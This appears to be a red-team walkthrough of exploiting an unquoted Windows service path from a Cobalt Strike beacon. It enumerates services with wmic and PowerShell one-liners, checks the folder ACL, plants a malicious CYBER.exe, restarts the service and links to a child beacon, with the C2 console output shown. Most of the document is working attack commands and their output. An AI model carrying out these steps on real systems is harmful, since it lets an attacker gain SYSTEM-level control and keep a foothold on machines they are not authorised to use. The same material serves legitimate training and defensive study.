We are looking for service that we have permissions to but we was configured correctly, and we can change the path for this service. We are looking for services without quotes and that they have spaces in them.
First we will use wmic to pull all services and their paths
wmic service get name, pathname
AJRouter C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted
ALG C:\\Windows\\System32\\alg.exe
AppIDSvc C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted
ose "c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE"
Sense "C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe"
VGAuthService "C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe"
CYBERFwSvc C:\\Program Files\\CYBER\\CYBER FW\\FwSvc.exe
Manual check
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Or we can use the following powershell link to find services without quotes:
beacon> powerpick gwmi win32_service | ?{$_} | where {($_.pathname -ne $null) -and ($_.pathname.trim() -ne "")} | where {-not $_.pathname.StartsWith("`"")} | where {($_.pathname.Substring(0, $_.pathname.IndexOf(".exe") + 4)) -match ". ."}
[*] Tasked beacon to run: gwmi win32_service | ?{$_} | where {($_.pathname -ne $null) -and ($_.pathname.trim() -ne "")} | where {-not $_.pathname.StartsWith("`"")} | where {($_.pathname.Substring(0, $_.pathname.IndexOf(".exe") + 4)) -match ". ."} (unmanaged)
[+] host called home, sent: 134767 bytes
[+] received output:
ExitCode : 1067
Name : CYBERFwSvc
ProcessId : 0
StartMode : Auto
State : Stopped
Status : OK
From the location C:\\Program Files\\CYBER\\CYBER FW\\FwSvc.exe We can see that there is no quotes and we have spaces in the name.
Windows will attempts to read the path to this executable, it interprets the space as a kind of terminator. So it will attempt to execute the following (in order):
C:\\Program.exe
C:\\Program Files\\CYBER\\CYBER.exe
C:\\Program Files\\CYBER\\CYBER FW\\FwSvc.ex
Once we identified a service we can check the permissions of the service using the Get-Acl cmdlet
beacon> powerpick Get-Acl -Path "C:\\Program Files\\CYBER\\" | Format-List
[*] Tasked beacon to run: Get-Acl -Path "C:\\Program Files\\CYBER\\" | Format-List (unmanaged)
[+] host called home, sent: 134767 bytes
[+] received output:
Path : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\CYBER\\
Owner : BUILTIN\\Administrators
Group : WKSTN-3721\\None
Access : CREATOR OWNER Allow FullControl
NT AUTHORITY\\SYSTEM Allow FullControl
BUILTIN\\Administrators Allow FullControl
BUILTIN\\Users Allow ReadAndExecute, Synchronize
BUILTIN\\Users Allow Write, Synchronize
NT SERVICE\\TrustedInstaller Allow FullControl
APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APP PACKAGES Allow ReadAndExecute,
Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-3044885426-1600074939-3914761197-513D:PAI(A;OICIIO;FA;;;CO)(A;OICI;FA;;;SY)
(A;OICI;FA;;;BA)(A;OICI;0x1200a9;;;BU)(A;;0x100116;;;BU)(A;CI;FA;;;S-1-5-80-956008885-3418
522649-1831038044-1853292631-2271478464)(A;OICI;0x1200a9;;;AC)(A;OICI;0x1200a9;;;S-1-15-2-
2)
We will create malicious file named CYBER.exe and upload it to C:\\Program Files\\CYBER\\ and then restart the service
beacon> powershell stop-service CYBERFwSvc
[*] Tasked beacon to run: stop-service CYBERFwSvc
[+] host called home, sent: 127 bytes
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="<http://schemas.microsoft.com/powershell/2004/04>"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Searching for available modules</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Processing</T><SR>-1</SR><SD>Searching UNC share \\\\fs-1\\home$\\r.mckenzie\\Documents\\WindowsPowerShell\\Modules.</SD></PR></MS></Obj><Obj S="progress" RefId="1"><TNRef RefId="0" /><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Searching for available modules</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD>Searching UNC share \\\\fs-1\\home$\\r.mckenzie\\Documents\\WindowsPowerShell\\Modules.</SD></PR></MS></Obj><Obj S="progress" RefId="2"><TNRef RefId="0" /><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
beacon> powershell start-service CYBERFwSvc
[*] Tasked beacon to run: start-service CYBERFwSvc
[+] host called home, sent: 127 bytes
[+] received output:
#< CLIXML
beacon> connect 127.0.0.1 1775
[*] Tasked to connect to 127.0.0.1:1775
[+] host called home, sent: 20 bytes
[+] established link to child beacon: 10.10.121.112